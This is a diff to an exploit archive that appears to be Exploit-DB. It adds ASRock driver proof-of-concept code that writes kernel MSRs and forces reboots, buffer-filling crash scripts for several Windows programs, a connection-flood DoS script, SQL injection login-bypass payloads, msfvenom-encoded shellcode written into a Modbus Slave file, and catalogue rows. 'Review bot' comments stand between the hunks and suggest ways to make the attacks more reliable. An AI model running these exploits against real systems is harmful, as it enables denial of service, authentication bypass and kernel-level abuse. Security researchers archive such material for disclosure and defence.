- aborting...\n"); + exit(0); + } + + ULONG64 a = GIO_RDMSR(0xC0000082); + printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a); + printf("press ENTER for instant BSOD\n"); + getchar(); + + a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222); + return (int)CloseHandle(ghDriver); +} +-----/ + +7.4. *Port mapped I/O access* + +[CVE-2018-10712] + +AsrDrv exposes functionality to read/write data from/to IO ports. This +could be leveraged in a number of ways to ultimately run code with +elevated privileges. + +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to IO ports + +#include +#include + +#define IOCTL_ASROCK_PORTREADB 0x222810 +#define IOCTL_ASROCK_PORTWRITEB 0x222814 + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_CR_STRUCT { + DWORD port; + ULONG64 value; +} ASROCK_CR_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + BYTE outbuffer[0x10] = { 0 }; \ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ + return outbuffer[1]; \ + +BYTE ASROCK_ReadPortB(DWORD port) +{ + ASROCK_CR_STRUCT inbuffer = { port, 0}; + IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10) +} + +BYTE ASROCK_WritePortB(DWORD port, ULONG64 value) +{ + ASROCK_CR_STRUCT inbuffer = { port, value}; + IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10) +} + +void Reboot() +{ + BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6; + ASROCK_WritePortB(0xcf9, cf9 | 2); + Sleep(50); + ASROCK_WritePortB(0xcf9, cf9 | 0xe); + Sleep(50); +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ 
+ printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! - aborting...\n"); + exit(0); + } + + Reboot(); + return (int)CloseHandle(ghDriver); +} +-----/ + +8. *Report Timeline* +2018-03-12: SecureAuth sent an initial notification to ASRock America +Support. +2018-03-13: ASRock confirmed the receipt and requested additional +information in order to send it to its HQ. +2018-03-13: SecureAuth answered saying that a draft advisory has been +written, including a technical description, and requested for PGP keys +in order to send it encrypted. +2018-03-14: ASRock answered asking for the advisory in clear text. +2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text +form. +2018-03-14: ASRock confirmed the receipt and informed they would submit +it to the HQ for validation. +2018-03-23: SecureAuth requested a status update on the case. +2018-03-23: ASRock answered saying they didn't have a reply from HQ. +2018-03-26: ASRock notified SecureAuth they were still checking the +reported vulnerabilities and requested additional time. +2018-03-27: SecureAuth thanked the status update and informed ASRock +that would be in contact the following week. +2018-03-28: ASRock informed SecureAuth they checked the reported +vulnerabilities and they would have a preliminary schedule for the fix +at the end of April. +2018-03-28: SecureAuth thanked ASRock's reply. +2018-04-20: ASRock notified that the driver was modified and sent to +SecureAuth the fixed applications and requested for a feedback. +2018-04-23: SecureAuth acknowledged the reception of the fixed +applications. +2018-05-09: SecureAuth tested the modified driver and verified that the +issues detailed in the proofs of concept were solved. +For that reason, SecureAuth propose release date to be May 23rd. +2018-05-09: ASRock thanked SecureAuth's update and forwarded the +proposal to its HQ for a confirmation. 
+2018-05-15: ASRock notified SecureAuth that they were going to deploy
+the new driver architecture into each ASRock utility.
+For the whole project, ASRock estimated to finish by the end of June.
+2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had
+planned to release a security note.
+2018-05-23: ASRock informed that each utility would include a release
+note with a security description.
+2018-06-15: SecureAuth requested ASRock a status update about its
+timescale.
+2018-06-09: ASRock forwarded the request to its HQ.
+2018-06-19: ASRock informed that they had started to upload the fixed
+drivers for one of the supported motherboard series
+and they were going to continue uploading the drivers for other models.
+2018-07-11: SecureAuth requested ASRock a status update.
+2018-07-11: ASRock replied saying they were still working on the upload
+process.
+2018-08-06: SecureAuth requested ASRock a new status update.
+2018-08-16: ASRock notified SecureAuth they had finished with the update
+process.
+2018-10-17: SecureAuth set October 25th as the publication date.
+2018-10-25: Advisory CORE-2018-0005 published.
+
+9. *References*
+
+[1] http://www.asrock.com/
+
+10. *About SecureAuth Labs*
+
+SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
+with anticipating the future needs and requirements for information
+security technologies. We conduct research in several important areas of
+computer security, including identity-related attacks, system
+vulnerabilities and cyber-attack planning. Research includes problem
+formalization, identification of vulnerabilities, novel solutions and
+prototypes for new technologies. We regularly publish security
+advisories, primary research, technical publications, research blogs,
+project information, and shared software tools for public use at
+http://www.secureauth.com.
+
+11.
*About SecureAuth*
+
+SecureAuth is leveraged by leading companies, their employees, their
+customers and their partners to eliminate identity-related breaches.
+As a leader in access management, identity governance, and penetration
+testing, SecureAuth is powering an identity security revolution by
+enabling people and devices to intelligently and adaptively access
+systems and data, while effectively keeping bad actors from doing harm.
+By ensuring the continuous assessment of risk and enablement of trust,
+SecureAuth's highly flexible Identity Security Automation (ISA) platform
+makes it easier for organizations to prevent the misuse of credentials
+and exponentially reduce the enterprise threat surface. To learn more,
+visit www.secureauth.com, call (949) 777-6959, or email us at
+info@secureauth.com
+
+12. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2018 SecureAuth, and are
+licensed under a Creative Commons Attribution Non-Commercial Share-Alike
+3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/
\ No newline at end of file
diff --git a/exploits/windows/dos/45732.txt b/exploits/windows/dos/45732.txt
new file mode 100644
index 000000000..153cfb2ac
--- /dev/null
+++ b/exploits/windows/dos/45732.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.modbustools.com/
+# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
+# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe
+# Version: 7.0.0
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18759
+
+# POC:
+# 1)
+# F3 & Connection / Connect / Registration Key
+
+#!/usr/bin/python
+
+buffer = "A" * 603
+try:
+ f=open("sie.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45705.py b/exploits/windows_x86-64/dos/45705.py
new file mode 100755
index 000000000..3c9dccc6f
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45705.py
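Review bot: The bare `except:` at the end of the script swallows the reason `sie.txt` could not be written (permissions, read-only directory, even a KeyboardInterrupt) and should be narrowed to `except IOError as e: print "File cannot be created: %s" % e`. The header records no crash evidence for the 603-byte Registration Key input — no exception code, faulting module or stack state — so a reader cannot distinguish an unhandled exception from memory corruption; a comment holding the debugger output would make the DoS claim checkable. The `print` statements make this Python 2 only, which the plain `#!/usr/bin/python` shebang does not convey.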
@@ -0,0 +1,25 @@
+# Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
+# Author: Rafael Alfaro
+# Discovery Date: 2018-10-27
+# Vendor Homepage: https://www.navicat.com/es/
+# Software Link : https://www.navicat.com/es/download/navicat-premium
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 x64 en, Windows 10 Home x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python Navicat-SSH.py
+# 2.- Open navicat.txt and copy content to clipboard
+# 3.- Open navicat.exe
+# 4.- Click "Conexion" and select "MySQL..."
+# 5.- In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1).
+# 6.- In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin).
+# 7.- Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena".
+# 8.- Click "Aceptar".
+# 9.- Crashed!
+
+# !/usr/bin/env python Navicat-SSH.py
+
+buffer = "\x41" * 5000
+f = open("navicat.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45708.py b/exploits/windows_x86-64/dos/45708.py
new file mode 100755
index 000000000..0060be1d7
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45708.py
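Review bot: The header should say plainly that this is a self-inflicted client crash — the 5000-byte string is pasted by the operator into their own connection dialog's password field (steps 2 and 7), so no remote or untrusted party triggers it — which bounds the impact well below what a 'Denial of Service' title implies. No crash detail is recorded (exception code, faulting module, whether the input lands in a fixed-size buffer), so an overflow cannot be told apart from a plain unhandled exception; a comment such as `# Crash detail: <exception code / faulting module from the debugger>` would let others verify it. The `# !/usr/bin/env python Navicat-SSH.py` line is a comment rather than a shebang, so despite the `100755` mode the file is not directly executable; a real `#!/usr/bin/env python` on line 1 would fix that.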
@@ -0,0 +1,22 @@
+# Exploit Title: AlienIP 2.41 - Denial of Service (PoC)
+# Author: Arturo de la Cruz Tellez
+# Discovery Date: 2018-10-17
+# Vendor Homepage: http://www.armcode.com
+# Tested Version: 2.41
+# Tested on OS: Microsoft Windows 10 Home Single Language x64
+# Versión 10.0.10240 compilación 10240
+
+# PoC
+# Steps to produce the crash
+# 1.- Run python code : python AlienIP2.41.py
+# 2.- Open AlienIP2.41.txt and copy context to clipboard
+# 3.- Open AlienIP.exe
+# 4.- Paste clipboard on IP address or Country
+# 5.- Click in Locate host
+# 5.- Enter
+# 6.- Crashed alienip.exe dejo de funcionar
+
+buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69
+f = open ("AlienIP2.41.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45711.py b/exploits/windows_x86-64/dos/45711.py
new file mode 100755
index 000000000..2aab9a546
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45711.py
@@ -0,0 +1,46 @@
+# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.ujang-rohidin.blogspot.com/
+# Software Link: https://sourceforge.net/projects/local-server/files/latest/download
+# Version: 1.0.9
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18756
+
+# POC:
+# 1)
+
+#!/usr/bin/python
+import socket
+
+print """
+ \\\|///
+ \\ - - //
+ ( @ @ )
+ ----oOOo--(_)-oOOo----
+ Local Server 1.0.9 Dos
+ Ihsan Sencan
+ ---------------Ooooo----
+ ( )
+ ooooO ) /
+ ( ) (_/
+ \ (
+ \_)
+"""
+Ip = raw_input("[Ip]: ")
+Port = 4008 # Default port
+
+d=[]
+c=0
+while 1:
+ try:
+ d.append(socket.create_connection((Ip,Port)))
+ d[c].send("DOOM")
+ print "Sie!"
+ c+=1
+ except socket.error:
+ print "+ Done! +"
+ raw_input()
+ break
\ No newline at end of file
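Review bot: The payload is shaped like a dotted quad (three 200-byte groups and a 69-byte tail separated by `.`), which suggests the crash lives in the address parser rather than in raw input length, yet the header neither says so nor records the faulting module; a comment like `# dotted input 200.200.200.69 bytes; faults in <module> at <address>` would make the claim reproducible. As with the other clipboard PoCs, the operator pastes into their own GUI, so this is a local self-crash with no remote trigger, and that belongs in the header. The step list also numbers two consecutive entries `5.-`, and the last step mixes Spanish (`dejo de funcionar`) into an otherwise English list.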
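Review bot: `print "+ Done! +"` fires on any `socket.error`, so the loop cannot distinguish the target refusing or timing out connections from the attacking process exhausting its own file descriptors or ephemeral ports — the sockets appended to `d` are never closed, so against a well-provisioned target this script hits the local limit first and reports success falsely. Catch the error as `except socket.error as e:` and print `e.errno` so ECONNREFUSED/ETIMEDOUT can be told from EMFILE/EADDRNOTAVAIL before the service is declared down, and cap `c` so the script terminates without starving the attacker host. `Port = 4008 # Default port` is asserted without a vendor reference in the header; it is presumably the listener's shipped default, but that should be stated or hedged.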
diff --git a/exploits/windows_x86-64/local/45709.vb b/exploits/windows_x86-64/local/45709.vb
new file mode 100644
index 000000000..b5ad5472a
--- /dev/null
+++ b/exploits/windows_x86-64/local/45709.vb
@@ -0,0 +1,57 @@
+# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection
+# Dork: N/A
+# Date: 2018-10-29
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/janobe
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip
+# Version: 1.0
+# Category: Windows
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-18806
+
+# POC:
+# 1)
+
+User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
+Pass: Null
+
+# POC:
+# 2)
+# User: 'or 1=1 or ''='
+# Pass: Null
+#
+# https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png
+#
+#[PATH]/include/user.vb / 28 / '" & username & "'
+#....
+#24 Public Sub login(ByVal username As Object, ByVal pass As Object)
+#25 Try
+#26
+#27 con.Open()
+#28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")
+#29
+#30
+#31 If dt.Rows.Count > 0 Then
+#32
+#33 If dt.Rows(0).Item("Role") = "Administrator" Then
+#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))
+#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
+#36 Form1.LogoutToolStripMenuItem.Text = "Logout"
+#37 visibleMenu("true", "admin")
+#38 LoginForm1.Close()
+#39 Else
+#40 visibleMenu("true", "not admin")
+#41 Form1.LogoutToolStripMenuItem.Text = "Logout"
+#42 LoginForm1.Close()
+#43 End If
+#44
+#45 Else
+#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)
+#47 End If
+#48 Catch ex As Exception
+#49 MsgBox(ex.Message)
+#50 End Try
+#51 con.Close()
+#52 da.Dispose()
+#53 End Sub
+#....
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45710.pl b/exploits/windows_x86/local/45710.pl
new file mode 100755
index 000000000..6aa446d2b
--- /dev/null
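Review bot: The concatenation quoted from line 28 injects `pass` as well as `username` (`sha1('" & pass & "')`), so scoping the finding to the `'login'` username field understates it — both inputs reach the query unescaped and the advisory should say so. The same line shows passwords verified as unsalted `sha1()` computed inside the database, a second weakness worth recording because any table dump obtained through the injection yields directly crackable hashes. No remediation is given: the fix is a parameterized query (bind `@username`/`@pass` on the command object instead of string-building) together with application-side salted, slow password hashing; it is also worth noting that the `'or 1=1 or ''='` bypass logs in as whichever row the database returns first and only reaches the admin branch if that row's `Role` is `Administrator` (line 33).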
+++ b/exploits/windows_x86/local/45710.pl
@@ -0,0 +1,43 @@
+# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
+# Author: Kağan Çapar
+# Discovery Date: 2018-10-27
+# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
+# Vendor Homepage : https://www.modbustools.com
+# Tested Version: 7
+# Tested on OS: Windows XP SP3 *ENG
+# other version should be affected
+# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!.
+# Speed up your PLC programming with this simulating tools. Used for SCADA systems.
+# Modbus is a serial communications protocol originally published by Schneider Electric
+# Steps to Reproduce: Run the perl exploit script, it will create a new
+# file with the name "exploit.msw" and Drag on to "mbslave.exe"
+# you will see a loop and crash on software
+# Greetz : cwd-onkan-badko-key-akkus
+
+# ! /usr/bin/perl
+
+# Dump of assembler code for function loop:
+# 0x0000555555558030 <+0>: mov $0x1e3b563c,%ebx
+# 0x0000555555558035 <+5>: fld %st(4)
+# 0x0000555555558037 <+7>: fnstenv -0xc(%rsp)
+# 0x000055555555803b <+11>: pop %rax
+# 0x000055555555803c <+12>: sub %ecx,%ecx
+# 0x000055555555803e <+14>: mov $0x1,%cl
+# 0x0000555555558040 <+16>: xor %ebx,0x14(%rax)
+# 0x0000555555558043 <+19>: add $0x4,%eax
+# 0x0000555555558046 <+22>: add 0x10(%rax),%ebx
+# 0x0000555555558049 <+25>: fisubs 0xe0d0(%rbx)
+
+# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
+# print /x &loop
+# $1 = 0x555555558030
+
+open(code, ">exploit.msw");
+binmode(code);
+$loop =
+"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
+"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
+"\xe0";
+
+print code $loop;
+close(code);
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 61af09461..4e22bdb53 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
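Review bot: The disassembly in the comments was taken on a 64-bit Linux host (addresses `0x0000555555558030`, `%rsp`/`%rbx`, gdb's `print /x &loop`) and describes the shikata_ga_nai-encoded stub itself, not the crash on the Windows XP target, so it says nothing about where `mbslave.exe` faults; a 29-byte `.msw` file is an unusual input to call a 'Buffer Overflow' without a faulting address or register dump, and until a comment records the exception code, EIP and whether EIP is attacker-influenced, 'malformed file crash' is the honest title. `open(code, ">exploit.msw");` ignores failure, so a write error is indistinguishable from a successful run; use `open(my $fh, '>', 'exploit.msw') or die "exploit.msw: $!";` under `use strict;`. The quoted `--platform windows_86` does not look like a valid msfvenom platform name (the usual form is `--platform windows -a x86`), so the command that actually produced these bytes should be confirmed.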
@@ -6158,6 +6158,13 @@ id,file,description,date,author,type,platform,port
 45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64,
 45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
 45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux,
+45705,exploits/windows_x86-64/dos/45705.py,"Navicat 12.0.29 - 'SSH' Denial of Service (PoC)",2018-10-29,"Rafael Alfaro",dos,windows_x86-64,
+45708,exploits/windows_x86-64/dos/45708.py,"AlienIP 2.41 - Denial of Service (PoC)",2018-10-29,"Arturo de la Cruz Tellez",dos,windows_x86-64,
+45711,exploits/windows_x86-64/dos/45711.py,"Local Server 1.0.9 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows_x86-64,
+45714,exploits/linux/dos/45714.c,"systemd - reexec State Injection",2018-10-29,"Google Security Research",dos,linux,
+45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
+45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
+45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10054,6 +10061,8 @@ id,file,description,date,author,type,platform,port
 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
+45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
+45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16897,6 +16906,7 @@ id,file,description,date,author,type,platform,port
 45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows,
 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
+45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40214,3 +40224,26 @@ id,file,description,date,author,type,platform,port
 45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
 45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
 45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
+45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
+45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
+45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
+45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,
+45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80
+45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80
+45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45721,exploits/php/webapps/45721.txt,"Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45722,exploits/php/webapps/45722.txt,"School Event Management System 1.0 - SQL Injection",2018-10-29,"Ihsan
Sencan",webapps,php,80
+45723,exploits/php/webapps/45723.txt,"School Event Management System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
+45724,exploits/php/webapps/45724.txt,"School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
+45725,exploits/php/webapps/45725.txt,"School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80
+45726,exploits/php/webapps/45726.txt,"School Attendance Monitoring System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80
+45727,exploits/php/webapps/45727.txt,"School Attendance Monitoring System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45728,exploits/php/webapps/45728.txt,"PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45729,exploits/php/webapps/45729.txt,"RhinOS CMS 3.x - Arbitrary File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
+45730,exploits/php/webapps/45730.txt,"E-Negosyo System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45731,exploits/php/webapps/45731.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80
+45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80
+45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80
+45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80